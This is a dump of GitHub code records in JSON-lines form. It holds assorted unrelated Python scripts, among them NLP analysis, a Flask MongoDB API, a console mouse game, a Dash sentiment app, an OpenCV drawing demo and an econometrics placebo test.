\n","repo_name":"glossyyoon/DailyCoding","sub_path":"백트래킹/2580.py","file_name":"2580.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31345953393","text":"import nltk\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk import pos_tag\n\n\ndef analyze_adjective_usage(text):\n sentences = sent_tokenize(text)\n\n attributive_count = 0\n predicative_count = 0\n\n sentence_identification_dict = {} # 1 for attributive, 2 for predicative, 0 for not identified\n\n for sentence in sentences:\n words = word_tokenize(sentence)\n tagged_words = pos_tag(words)\n\n for i, (word, pos) in enumerate(tagged_words):\n if pos == \"JJ\":\n if i + 1 < len(tagged_words) and tagged_words[i + 1][1] == \"NN\":\n attributive_count += 1\n sentence_identification_dict[sentence] = 0\n elif i > 0 and tagged_words[i - 1][1] in {\"VB\", \"VBD\", \"VBG\", \"VBN\", \"VBP\", \"VBZ\"}:\n predicative_count += 1\n sentence_identification_dict[sentence] = 1\n ratio = (attributive_count, predicative_count)\n return ratio, sentence_identification_dict\n\n\ntext = input(\"Enter text: \")\nresult, result_dict = analyze_adjective_usage(text)\nprint(\"Sentence identification:\")\nfor sentence, value in result_dict.items():\n print(f\"{value} : {sentence}\")\nprint(f\"Attributive adjectives: {result[0]}, Predicative adjectives: {result[1]}\")\n","repo_name":"yatoyun/Authorship_analysis2023_A","sub_path":"Unit6/Unit-6-1.py","file_name":"Unit-6-1.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35484846577","text":"\"\"\"\nCompiles all FITS files in an input directory into one.\n\"\"\"\n\nimport argparse\n\nrequired_input = \"\"\nexample_value = 10.\nexample_flag = False\n\n\ndef process_arguments():\n \"\"\" Gather all user arguments, and set global variables if necessary. \"\"\"\n global required_input\n global example_value\n global example_flag\n\n parser = argparse.ArgumentParser(description=\"This is the description of the software.\",\n epilog=\"Include a final message (for -h) here.\")\n\n parser.add_argument(\"required_value\", type=str,\n help=\"This is a required value. The code will not run if this is not included. The remaining\" +\n \" flags are optional flags.\")\n\n parser.add_argument(\"-t\", \"--test_value\", type=float,\n help=\"This is a test value for an input float\")\n parser.add_argument(\"-f\", \"--test_flag\", action=\"store_true\",\n help=\"This is an example flag that can be set to true\")\n\n # Get all input arguments\n args = parser.parse_args()\n\n if args.test_value is not None:\n example_value = args.test_value\n # You could also probably do example_flag = args.test_flag, but I personally prefer this consistent approach\n if args.test_flag:\n example_flag = True\n\n required_input = args.required_value\n\n return args\n\n\narguments = process_arguments()\n\nprint(required_input, example_value, example_flag)","repo_name":"HSouch/HelpfulSnippets","sub_path":"CLArgsTemplate.py","file_name":"CLArgsTemplate.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3779906787","text":"from flask_restplus import Resource, Namespace\nfrom flask_restplus import reqparse\nfrom src.main import Engine\nimport config\nfrom src.data.question import QuestionMaker\nfrom src.db.questions import index as _questions\nfrom .utils import *\nfrom bson import ObjectId\n\n_question_maker = QuestionMaker()\nCONFIG = config.QUESTION\nengine = Engine()\nQUESTIONS = 0\nQUERIES = 1\n\napi = Namespace('v2/db/answer', 'DataBase Answer endpoint')\n\nfilter = {'_id': 1, 'text': 1, 'answer': 1}\n\n\n@api.route('/')\nclass Questions(Resource):\n\n @api.doc('모든 답변들의 id, 질문')\n def get(self):\n return cursor_to_json(list(_questions.collection.find({}, filter)))\n\n @api.doc('답변 추가/ 수정', params={'text': '등록 할 답변의 질문', 'answer': '답변', 'category': str(CONFIG['categories'])})\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('text', type=str, required=True)\n parser.add_argument('answer', type=str, required=False, help='답변(default=None)')\n parser.add_argument('category', type=str, required=True, choices=CONFIG['categories'], help='카테고리')\n args = parser.parse_args(strict=True)\n\n engine.insert_question(args['text'], args['answer'], args['category'])\n return {'status': 'success'}\n\n\n@api.route('/')\nclass Questions(Resource):\n\n @api.doc('텍스트가 포함 된 답변리스트')\n def get(self, text):\n return cursor_to_json(_questions.collection.find({'$text': {'$search': text}}, filter))\n\n\n@api.route('/')\nclass Questions(Resource):\n\n @api.doc('해당하는 아이디의 답변', params={'_id': 'String'})\n def get(self, _id):\n return _questions.collection.find_one({'_id': ObjectId(_id)})\n\n @api.doc('답변의 질문텍스트, 답변, 카테고리 수정', params={'text': '질문', 'answer': '답변', 'category': '카테고리'})\n def patch(self, _id):\n parser = reqparse.RequestParser()\n parser.add_argument('text', required=False, default=None, help='수정 될 질문')\n parser.add_argument('answer', required=False, default=None, help='수정 될 답변')\n parser.add_argument('category', required=False, default=None, help='수정 될 카테고리')\n args = parser.parse_args(strict=True)\n\n text = args['text']\n answer = args['answer']\n category = args['category']\n\n target = _questions.collection.find_one({'_id': ObjectId(_id)})\n if text:\n target['text'] = text\n if answer:\n target['answer'] = answer\n if category:\n target['category'] = category\n\n return {'status': str(_questions.collection.update_one({'_id': ObjectId(_id)}, update={'$set': target}))}\n\n @api.doc('해당 아이디 답변 삭제')\n def delete(self, _id):\n return {'status': str(_questions.collection.delete_one({'_id': ObjectId(_id)}))}\n\n\n@api.route('/rebase')\nclass Questions(Resource):\n\n @api.doc('데이터베이스 리베이스')\n def get(self):\n _question_maker.rebase()\n return {'status': 'done'}\n","repo_name":"14hy/chatbot-backend","sub_path":"api/v2/database/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"2130250840","text":"\"\"\"\nFilename: create_test_queries.py\n\nAuthors:\n Nicholas Joodi - npjoodi@ucdavis.edu\n Jason Youn - jyoun@ucdavis.edu\n\nDescription:\n Create test queries based on the data file passes as input.\n\nTo-do:\n\"\"\"\n# standard imports\nimport argparse\nimport random\n\n\ndef parse_argument():\n \"\"\"\n Parse input arguments.\n\n Returns:\n - parsed arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='generate test queries')\n\n parser.add_argument(\n '--predicate',\n nargs='?',\n required=True,\n help='the predicate that we will get the scores for')\n\n parser.add_argument(\n '--data_file',\n metavar='dir',\n nargs='?',\n default='dev.txt',\n help='file path containing the data')\n\n parser.add_argument(\n '--dir',\n metavar='dir',\n nargs='?',\n default='./',\n help='base directory')\n\n return parser.parse_args()\n\n\ndef main():\n \"\"\"\n Main function.\n \"\"\"\n args = parse_argument()\n relation = args.predicate\n data_file = args.data_file\n\n with open(data_file, \"r\") as _file:\n lines = _file.readlines()\n\n queries = {}\n queries_neg = {}\n\n for line in lines:\n columns = line.strip().split('\\t')\n columns = [x.strip() for x in columns]\n\n if columns[1] == relation:\n subject = \"c$\" + columns[0]\n _object = \"c$\" + columns[2]\n\n if columns[3] == '1': # positive queries\n if subject not in queries:\n queries[subject] = set()\n queries[subject].add(_object)\n else:\n queries[subject].add(_object)\n else: # negative queries\n if subject not in queries_neg:\n queries_neg[subject] = set()\n queries_neg[subject].add(_object)\n else:\n queries_neg[subject].add(_object)\n\n with open(args.dir + \"/queriesR_test/\" + relation, \"w\") as _file:\n # positive queries\n for key, val in queries.items():\n o = random.sample(val, 1)[0]\n _file.write(key + '\\t' + o)\n val.remove(o)\n\n for o in val:\n _file.write(' ' + o)\n\n _file.write('\\t')\n\n if key in queries_neg:\n neg_v = queries_neg[key]\n o = random.sample(neg_v, 1)[0]\n _file.write(o)\n neg_v.remove(o)\\\n\n for o in neg_v:\n _file.write(' ' + o)\n\n _file.write('\\n')\n\n # negative queries\n for key, val in queries_neg.items():\n if key not in queries:\n o = random.sample(val, 1)[0]\n _file.write(key + '\\t\\t' + o)\n val.remove(o)\n\n for o in val:\n _file.write(' ' + o)\n\n _file.write('\\n')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"IBPA/KIDS","sub_path":"hypothesis_generator/pra/io_util/create_test_queries.py","file_name":"create_test_queries.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"10549948067","text":"import boto3\nimport constants\nfrom utilities.sentiment_utils import return_fake_data\nfrom utilities.utils import remove_new_lines\nfrom data_accessor import s3_accessor as s3\nimport os\n\ncomprehend_client = boto3.client(service_name='comprehend', region_name='us-east-1')\n\n\n# batch_detect_sentiment analyzes at most 25 documents\ndef analyze_batch_posts(documents):\n num_docs = len(documents)\n if num_docs <= 25:\n try:\n if os.environ[\"ENABLE_COMPREHEND\"] == \"true\":\n # returns {\"ResultList\":[], \"ErrorList\":[]}\n return comprehend_client.batch_detect_sentiment(TextList=documents, LanguageCode='en')\n elif os.environ[\"ENABLE_COMPREHEND\"] == \"false\":\n # fake sentiment data\n return return_fake_data(num_docs)\n except KeyError:\n print(\"No such key ENABLE_COMPREHEND\")\n return return_fake_data(num_docs)\n else:\n raise ValueError(\"Too many documents sent for analysis\", documents)\n\n\ndef analyze_async_job(posts, query_parameters):\n print(\"setting up async job\")\n cleaned_posts = remove_new_lines(posts)\n metadata = {\"campaign_name\": query_parameters.name}\n text_container, id_container = s3.setup_docs_for_upload(cleaned_posts, metadata)\n s3.upload_collection(constants.s3_input_bucket_name, text_container, id_container)\n response = start_sentiment_detection_job()\n print(\"async sentiment analysis job id\", response[\"JobId\"])\n\n\ndef start_sentiment_detection_job():\n return comprehend_client.start_sentiment_detection_job(\n InputDataConfig={\n 'S3Uri': constants.s3_input_bucket_uri,\n 'InputFormat': 'ONE_DOC_PER_LINE'\n },\n OutputDataConfig={\n 'S3Uri': constants.s3_output_bucket_uri\n },\n DataAccessRoleArn=constants.s3_data_access_role_arn,\n JobName=constants.s3_comprehend_sentiment_detection_job_name,\n LanguageCode='en'\n )\n\n","repo_name":"felixglush/KeywordSentimentServerless","sub_path":"sentiment/sentimenter.py","file_name":"sentimenter.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"9086090410","text":"import os\r\nimport time\r\nimport pickle\r\nfrom random import randint\r\n\r\n\r\ndef get_grid_size() -> int:\r\n \"\"\"\r\n Get input from user for size of the grid\r\n \"\"\"\r\n grid_size = input('Grid size?: ')\r\n \r\n while not grid_size.isdigit():\r\n grid_size = input('Grid size?: ')\r\n return int(grid_size)\r\n\r\n\r\ndef make_grid(grid_size: int):\r\n \"\"\"\r\n Creates nxn grid using grid_size and 🧱\r\n\r\n :param grid_size: int, used to create square grid\r\n\r\n :return: list, grid filled with 🧱\r\n \"\"\"\r\n grid = []\r\n for _ in range(grid_size):\r\n grid.append([\"🧱\" for _ in range(grid_size)])\r\n return grid\r\n\r\n\r\ndef initialize_grid(grid: list, cheese_list, initial_mouse_position):\r\n \"\"\"\r\n Creates boundaries of the grid, fills in the 🧀, and spawns the 🐁\r\n\r\n :param grid: list\r\n :param cheese_list: list, tuple\r\n :param initial_mouse_position: list, tuple \r\n \"\"\"\r\n for h in range(len(grid)):\r\n for w in range(len(grid)):\r\n if [h, w] in initial_mouse_position and grid[h][w] != '🧀':\r\n grid[h][w] = '🐁'\r\n\r\n if (h < 1) or (h >= len(grid) - 1):\r\n grid[h][w] = '🟥'\r\n if (w < 1) or (w >= len(grid) - 1):\r\n grid[h][w] = '🟥'\r\n if (h, w) in cheese_list and grid[h][w] != '🐁':\r\n grid[h][w] = '🧀'\r\n\r\n\r\ndef get_cheese(grid):\r\n \"\"\"\r\n Creates 2 value coordinates of tuples and puts them inside a list\r\n\r\n :param grid: list\r\n\r\n :return: list, a list that contains 2 value tuples\r\n \"\"\"\r\n cheese_list = []\r\n while len(cheese_list) < 5:\r\n coor = (randint(1, len(grid)-2), randint(1, len(grid)-2))\r\n \r\n for _ in grid:\r\n if coor not in cheese_list:\r\n cheese_list.append(coor)\r\n\r\n return cheese_list\r\n\r\n\r\ndef get_mines(grid, cheese_list):\r\n \"\"\"\r\n Creates 2 value coordinates of tuples and puts them inside a list.\r\n Makes sure that the coordinates created don't already exist in cheese_list.\r\n\r\n :param grid: list\r\n :param cheese_list: list\r\n\r\n :return: list, a list that contains 2 value tuples\r\n \"\"\"\r\n mine_list = []\r\n while len(mine_list) < 5:\r\n coord = (randint(1, len(grid)-2), randint(1, len(grid)-2))\r\n \r\n for _ in grid:\r\n if coord not in mine_list and coord not in cheese_list:\r\n mine_list.append(coord)\r\n return mine_list\r\n\r\n\r\ndef place_remove_mine(grid, mine_position, place=True):\r\n \"\"\"\r\n Removes or places mines on the display.\r\n\r\n :param grid: list, contains the grid being manipulated\r\n :param mine_position: list, containes 2 value tuples that are mines coordinates\r\n :param place: bool, determines whether a mine is placed or removed.\r\n \"\"\"\r\n if place:\r\n grid[mine_position[0][0]][mine_position[0][1]] = '💥'\r\n else:\r\n grid[mine_position[0][0]][mine_position[0][1]] = '🧱'\r\n\r\n\r\ndef display_grid(grid: list, health=5, cheese_score=5):\r\n \"\"\"\r\n Creates the display and updates it.\r\n Clears the console each time before displaying anything.\r\n\r\n :param grid: list, grid used to display the boundaries\r\n :param health: int, used to track and display the users health\r\n :param cheese_score: int, used to track and display the users score\r\n \"\"\"\r\n os.system(\"clear\")\r\n print(\"life: \"+\"💖\"*health)\r\n print(\"cheese: \"+\"🧀\"*cheese_score, '\\n')\r\n for row in grid:\r\n for column in row:\r\n print(column, end='')\r\n print()\r\n\r\n\r\ndef get_direction_and_steps(grid, cheese, mines, mouse_position, health, cheese_score):\r\n \"\"\"\r\n Asks the user the direction they want to go to and the number of steps they want to take\r\n\r\n :return: str, int: returns a string containing direction and integer containing number of steps\r\n \"\"\"\r\n direction = \"\"\r\n while direction not in ['r', 'l', 'u', 'd']:\r\n direction = input(\"Enter move direction right(R), left(L), Up(U), Down(D), Save(S), quit(Q): \").lower()\r\n if direction == 'exit' or direction == 'q':\r\n quit()\r\n \r\n if direction == \"s\":\r\n save(grid, cheese, mines, mouse_position, health, cheese_score)\r\n print(\"Game saved!\")\r\n quit()\r\n\r\n steps = None\r\n while steps is None:\r\n try:\r\n steps = int(input(\"Enter number of steps: \"))\r\n except Exception as e:\r\n pass\r\n return direction, steps\r\n\r\n\r\ndef get_initial_mouse_position(grid):\r\n \"\"\"\r\n Randomly generates the initial position of the mouse on the grid.\r\n\r\n :param grid: list, used to control the range of random guesses\r\n\r\n :return: list, contains a 2 value list for the initial mouse coordinates\r\n \"\"\"\r\n return [[randint(1, len(grid)-2), randint(1, len(grid)-2)]]\r\n\r\n\r\ndef get_new_mouse_position(grid, cheese, mines, mouse_position, health, cheese_score):\r\n \"\"\"\r\n Asks the user where they want to move the mouse, \r\n it also forces the user to stay within boundaries\r\n\r\n :param grid: list, used to control the user from going beyond the boundaries\r\n :param mouse_position, used to create new mouse position\r\n \"\"\"\r\n old_mouse_position = [mouse_position[0].copy()]\r\n direction, steps = get_direction_and_steps(grid, cheese, mines, mouse_position, health, cheese_score)\r\n out_of_bound_message = \"Mouse can't be out of bounds!\"\r\n\r\n if direction == 'u':\r\n if mouse_position[0][0] - steps > 0:\r\n mouse_position[0][0] -= steps\r\n else:\r\n print(out_of_bound_message)\r\n\r\n if direction == 'd':\r\n if mouse_position[0][0] + steps < len(grid) - 1:\r\n mouse_position[0][0] += steps\r\n else:\r\n print(out_of_bound_message)\r\n if direction == 'l':\r\n if mouse_position[0][1] - steps > 0:\r\n mouse_position[0][1] -= steps\r\n else:\r\n print(out_of_bound_message)\r\n\r\n if direction == 'r':\r\n if mouse_position[0][1] + steps < len(grid) - 1:\r\n mouse_position[0][1] += steps\r\n else:\r\n print(out_of_bound_message)\r\n time.sleep(1)\r\n return old_mouse_position, mouse_position, direction\r\n\r\n\r\ndef change_mouse_position(grid, old_mouse_position, new_mouse_position):\r\n \"\"\"\r\n Changes mouse position from old position to new position.\r\n Replaces old mouse position on the grid with 🧱, places 🐁 on the new mouse position on the grid.\r\n\r\n :param grid: list, where 🧱, 🐁 are moved and placed\r\n :param old_mouse_position: list, contains a 2 value list representing old mouse coordinates\r\n :param new_mouse_position: list, contains a 2 value list representing new mouse coordinates\r\n \"\"\"\r\n grid[old_mouse_position[0][0]][old_mouse_position[0][1]] = '🧱'\r\n grid[new_mouse_position[0][0]][new_mouse_position[0][1]] = '🐁'\r\n\r\n\r\ndef update_mouse_info(grid, old_mouse_position, mouse_position, direction, cheese, cheese_score, health, mines):\r\n \"\"\"\r\n Tracks the path the mouse took when moving and determines if it did or didn't hit any cheese or mines,\r\n and if did hit a cheese or a mine it increases the score or decreases the mouse's health\r\n\r\n :param grid: list, used as argument when calling change_mouse_position, and display grid function\r\n :param old_mouse_position: list, contains a 2 value list representing old mouse coordinates\r\n :param new_mouse_position: list, contains a 2 value list representing new mouse coordinates\r\n :param direction: str, contains the direction the user choice to move\r\n :param cheese: list, contains 2 value tuples representing all of the cheeses coordinates\r\n :param cheese_score: int, used to track users score\r\n :param health: int, used to track mouses health\r\n :param mines: list, contains 2 value tuples representing all of the mines \r\n \r\n :return: int, int, list\r\n \"\"\"\r\n while old_mouse_position != mouse_position:\r\n prev_old_mouse_position = [old_mouse_position[0].copy()]\r\n if direction == 'u':\r\n old_mouse_position[0][0] -= 1\r\n elif direction == 'd':\r\n old_mouse_position[0][0] += 1\r\n elif direction == 'l':\r\n old_mouse_position[0][1] -= 1\r\n elif direction == 'r':\r\n old_mouse_position[0][1] += 1\r\n\r\n if tuple(old_mouse_position[0]) in cheese:\r\n cheese_score += 1\r\n cheese.remove(tuple(old_mouse_position[0]))\r\n\r\n if tuple(old_mouse_position[0]) in mines:\r\n health -= 1\r\n mouse_position = [prev_old_mouse_position[0].copy()]\r\n mines.remove(tuple(old_mouse_position[0]))\r\n place_remove_mine(grid, old_mouse_position)\r\n display_grid(grid, health, cheese_score)\r\n time.sleep(0.5)\r\n place_remove_mine(grid, old_mouse_position, place=False)\r\n display_grid(grid, health, cheese_score)\r\n break\r\n change_mouse_position(grid, prev_old_mouse_position, old_mouse_position)\r\n display_grid(grid, health, cheese_score)\r\n time.sleep(0.3)\r\n return cheese_score, health, mouse_position\r\n\r\n\r\ndef check_win_status(cheese):\r\n \"\"\"\r\n Checks if the user has won the game.\r\n\r\n :param cheese: list, used to track if there are any cheese coordinates left\r\n\r\n :return: bool, if there are no cheese coordinates left it returns False and a message congratulating the user for winning\r\n , otherwise it returns True\r\n \"\"\"\r\n if len(cheese) == 0:\r\n print(\"Congratulations, you won!\")\r\n return False\r\n return True\r\n\r\n\r\ndef check_lose_status(mines):\r\n \"\"\"\r\n Checks if the user has lost the game.\r\n\r\n :param mines: list, used to track if there are any mines coordinates left\r\n\r\n :return: bool, if there are no mines coordinates left it returns False and a message telling the user that they lost\r\n , otherwise it returns True\r\n \"\"\"\r\n if len(mines) == 0:\r\n print(\"Sorry, you lost!\")\r\n return False\r\n return True\r\n\r\n\r\ndef save(grid, cheese, mines, mouse_position, health, cheese_score):\r\n with open(\"game_state.rm\", \"wb\") as f:\r\n game_state = [\r\n grid,\r\n cheese,\r\n mines,\r\n mouse_position,\r\n health,\r\n cheese_score\r\n ]\r\n pickle.dump(game_state, f)\r\n\r\n\r\ndef load():\r\n files = os.listdir()\r\n for file in files:\r\n if file[-2:] == \"rm\":\r\n with open(file, \"rb\") as f:\r\n game_state = pickle.load(f)\r\n return game_state\r\n\r\n\r\ndef load_saved_game():\r\n user_response = input(\"Load saved game? (y/n): \").lower()\r\n \r\n if user_response == \"n\":\r\n return False\r\n else:\r\n files = os.listdir()\r\n for file in files:\r\n if file[-2:] == \"rm\":\r\n return True\r\n\r\n\r\nif __name__ == '__main__':\r\n if load_saved_game():\r\n grid, cheese, mines, mouse_position, health, cheese_score = load()\r\n else:\r\n grid_size = get_grid_size()\r\n grid = make_grid(grid_size)\r\n cheese = get_cheese(grid)\r\n mines = get_mines(grid, cheese)\r\n mouse_position = get_initial_mouse_position(grid)\r\n health = 5\r\n cheese_score = 0\r\n\r\n initialize_grid(grid, cheese, mouse_position)\r\n \r\n display_grid(grid, health, cheese_score)\r\n while check_win_status(cheese) and check_lose_status(mines):\r\n old_mouse_position, mouse_position, direction = get_new_mouse_position(\r\n grid, \r\n cheese, \r\n mines, \r\n mouse_position, \r\n health, \r\n cheese_score\r\n )\r\n cheese_score, health, mouse_position = update_mouse_info(\r\n grid, \r\n old_mouse_position, \r\n mouse_position, \r\n direction, \r\n cheese, \r\n cheese_score, \r\n health, \r\n mines\r\n )","repo_name":"Ntobeko-Themba-Malinga/Robot-Mouse","sub_path":"robot_mouse/robot_mouse.py","file_name":"robot_mouse.py","file_ext":"py","file_size_in_byte":11953,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"75016348105","text":"# Load the necessary packages\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport pandas as pd\nimport json\nfrom scipy.stats import spearmanr\nimport base64\nfrom app import app, title_style, header_style_centered, header_style, para_style, para_style_centered\nfrom textwrap import dedent as d\nfrom . import styles\nimport plotly.graph_objects as go\n\n# Precompute all the statistics\npoke_df = pd.read_csv('./pokemon_data.csv')\npoke_df.Sentiment = poke_df.Sentiment.apply(round, ndigits = 3)\n\n# Get all the found pokemon types\npoke_types = poke_df.Type.unique()\ncorr_dict = {}\ncorr_dict_stemmed = {}\npokemons_used = {}\nfor poke_type in poke_types:\n # First get the pokemons with the specific type\n pokemons_by_type = poke_df[poke_df['Type'] == poke_type]\n\n # Get their sentiment values and their total stats\n pokemons_by_type_sentiment_stemmed = pokemons_by_type['Sentiment_stemmed']\n pokemons_by_type_sentiment = pokemons_by_type['Sentiment']\n pokemons_by_type_total = pokemons_by_type['Total']\n\n # Check correlation between biology text sentiment and total stats and store it\n corr_coef_stemmed = spearmanr(pokemons_by_type_sentiment_stemmed, pokemons_by_type_total)[0]\n corr_coef = spearmanr(pokemons_by_type_sentiment, pokemons_by_type_total)[0]\n\n # Only check for correlation if more than 5 pokemons of this type exists\n if len(pokemons_by_type) >= 5:\n pokemons_used[poke_type] = pokemons_by_type\n corr_dict[poke_type] = round(corr_coef, 4)\n corr_dict_stemmed[poke_type] = corr_coef_stemmed\n\n# The types we made wordclouds for\nsingle_types = sorted(poke_df.Type.unique())[119:]\n\nimage_filename = 'wordclouds/Bug_wordcloud.png' # replace with your own image\nencoded_image = base64.b64encode(open(image_filename, 'rb').read())\n\nlayout = html.Div([\n dcc.Markdown('**Sentiment analysis**', style=title_style),\n html.Div(className='row', children=[\n html.Div(\n dcc.Markdown('**Correlation between sentiment of biology text and total power stats by pokemon type**',\n style=para_style_centered),\n className='nine columns'\n ),\n html.Div(\n dcc.Markdown('**Pokemons used to compute the statistics for the chosen type**',\n style=para_style_centered),\n className='three columns'\n ),\n\n ]),\n html.Div(className='row', children=[\n html.Div(className='nine columns', children=\n dcc.Graph(id='sentiment-power-correlation',\n figure={\n 'data': [\n dict(\n x=list(corr_dict.keys()),\n y=list(corr_dict.values()),\n type= 'bar',\n textangle = -90\n ),\n ],\n 'layout': dict(\n xaxis={'tickangle': 45},\n yaxis={'title': 'Spearman correlation', \"domain\": [-1, 1]},\n #title= 'Correlation between sentiment of biology text and total power stats by pokemon type',\n #title_style={'fontSize': '100px'},\n opacity= 0.7,\n clickmode= 'event+select'\n )\n }),\n ),\n\n html.Div(id='Table-for-pokemon',\n className='three columns',\n style={'fontSize':'15px'},\n children=[\n\n html.Table(\n [\n html.Tr([html.Th(col) for col in ['Pokémon', 'Sentiment', 'Total', 'Generation']])\n ]\n +\n [\n html.Tr([\n html.Td(pokemons_used['Bug'].iloc[i][col]) for col in ['Pokémon', 'Sentiment', 'Total', 'Generation']\n ]) for i in range(min(len(pokemons_used['Bug']), 10))\n ]\n )\n ]),\n ], style={'display': 'block', 'overflow': 'auto', 'paddingLeft': '50px', 'paddingRight': '50px'}),\n dcc.Markdown(d(\"\"\"\n The correlation statistics was computed for all types of pokémon which had 5 or more pokémons in that \n respective type. The measure of correlation is between the sentiment value of a pokémons biology paragraph on \n Bulbapedia and its total power (A sum of 6 of attributes). The Spearman rank correlation was used.\n \"\"\"), style={'fontSize': '20px', 'paddingLeft': '50px', 'paddingRight': '50px', 'paddingTop': '40px',\n 'textAlign': 'center'}),\n\n dcc.Markdown('**Wordclouds for different types of pokémon!**', style=header_style_centered),\n html.Div(\n children=[\n html.Img(id='wordcloud-image', src='data:image/png;base64,{}'.format(encoded_image.decode()),\n style=styles['img']),\n dcc.Slider(\n id='wc-slider',\n min=0,\n max=len(single_types)-1,\n value=0,\n marks={count: str(single_type) for count, single_type in enumerate(single_types)}\n )\n ],\n style={'paddingLeft': \"50px\", 'paddingRight': \"50px\"}\n )\n])\n\n\n@app.callback(\n Output('wordcloud-image', 'src'),\n [Input('wc-slider', 'value')])\ndef update_wordcloud(selected_type):\n image_path = f'wordclouds/{single_types[selected_type]}_wordcloud.png' #\n image_to_encode = base64.b64encode(open(image_path, 'rb').read())\n return 'data:image/png;base64,{}'.format(image_to_encode.decode())\n\n@app.callback(\n Output('Table-for-pokemon', 'children'),\n [Input('sentiment-power-correlation', 'clickData')]\n)\ndef update_table(clickData):\n if clickData is None:\n return dcc.Markdown('''### Click on a bar to see the pokemons used to compute the correlation''')\n x = json.loads(json.dumps(clickData))['points'][0]['x']\n if len(pokemons_used[x]) <= 10:\n shown_pokemons = dcc.Markdown(''' ''')\n else:\n shown_pokemons = dcc.Markdown(f'''### Showing 10 out of {len(pokemons_used[x])} pokemons''')\n return [shown_pokemons,\n html.Table(\n [html.Tr([html.Th(col) for col in ['Pokémon', 'Sentiment', 'Total', 'Generation']])] +\n\n [html.Tr([\n html.Td(pokemons_used[x].iloc[i][col]) for col in ['Pokémon', 'Sentiment', 'Total', 'Generation']\n ]) for i in range(min(len(pokemons_used[x]), 10))]\n )]\n\n","repo_name":"zyngielg/sgi-pokemon","sub_path":"apps/sentiment_analysis.py","file_name":"sentiment_analysis.py","file_ext":"py","file_size_in_byte":6603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69981913865","text":"#https://www.youtube.com/watch?v=V1aMDD5583k&list=PLS1QulWo1RIa7D1O6skqDQ-JZ1GGHKK-K&index=6&ab_channel=ProgrammingKnowledge\n\nimport numpy as np\nimport cv2\n\n# img = cv2.imread('lena.jpg', 1)\nimg = np.zeros([512, 512, 3], np.uint8) #width, height, np-data\n#st line\n# image-data, start-pt, end-pt, color-bgr, thickness\nimg = cv2.line(img, (0,0), (255,255), (147,96,44), 10)\n#arrow line\nimg = cv2.arrowedLine(img, (0,255), (255,255), (255,0,0), 5)\n\n#rectangle\n# image-data, top-vertex, low-vertx, color-bgr, thickness\nimg = cv2.rectangle(img, (384,0), (510,128), (0,0,255), 5)\nimg = cv2.rectangle(img, (0,265), (200,355), (0,255,255), -1)\n\n#circle\nimg = cv2.circle(img, (447, 64), 64, (0,255,0), 2)\nimg = cv2.circle(img, (255,55), 50, (255,255,255), )\n#text\n#image-data, text, start-pt, font-face, font-size, color, thickness, line-type\nfont = cv2.FONT_HERSHEY_SIMPLEX\nimg = cv2.putText(img, 'OpenCV', (10,500), font, 4, (255,255,255), 10, cv2.LINE_AA)\n\ncv2.imshow('image', img)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"bmanandhar/OpenCVExamples","sub_path":"05_geometric_shapes.py","file_name":"05_geometric_shapes.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74432857546","text":"import numpy\nimport textblob\nimport os\nimport re\n\npos = []\nneg = []\nfor filename in os.listdir('txt_sentoken/pos'):\n fp = open('txt_sentoken/pos/'+filename, 'r')\n doc = fp.read()\n doc = re.sub(r\"\\n\", \" \", doc) + '\\n'\n pos.append(doc)\n fp.close()\nprint('finish reading pos data')\nfor filename in os.listdir('txt_sentoken/neg'):\n fp = open('txt_sentoken/neg/'+filename, 'r')\n doc = fp.read()\n doc = re.sub(r\"\\n\", \" \", doc) + '\\n'\n neg.append(doc)\n fp.close()\nprint('finish reading neg data')\nfp_pos = open('pos.txt', 'w')\nfor doc in pos:\n fp_pos.write(doc)\nfp_pos.close()\nprint('finish writing pos data')\nfp_neg = open('neg.txt','w')\nfor doc in neg:\n fp_neg.write(doc)\nfp_neg.close()\nprint('finish writing neg data')\nprint('done')\n","repo_name":"luojiahai/cluster-cloud-backend","sub_path":"main/node/get_training_set.py","file_name":"get_training_set.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71919167625","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n'''\n@Project :Awesome-Uplift-Model \n@File :example_2.py\n@Author :JackHCC\n@Date :2022/12/3 17:49 \n@Desc :\n\n'''\nimport linearmodels as lm\nfrom causaldata import organ_donations\n\nod = organ_donations.load_pandas().data\n\n# Keep only pre-treatment data\nod = od.loc[od['Quarter_Num'] <= 3]\n\n# Create fake treatment variables\nod['California'] = od['State'] == 'California'\nod['FakeAfter1'] = od['Quarter_Num'] > 1\nod['FakeAfter2'] = od['Quarter_Num'] > 2\nod['FakeTreat1'] = 1 * (od['California'] & od['FakeAfter1'])\nod['FakeTreat2'] = 1 * (od['California'] & od['FakeAfter2'])\n\n# Set our individual and time (index) for our data\nod = od.set_index(['State', 'Quarter_Num'])\n\n# Run the same model as before\n# but with our fake treatment variables\nmod1 = lm.PanelOLS.from_formula('''Rate ~ \nFakeTreat1 + EntityEffects + TimeEffects''', 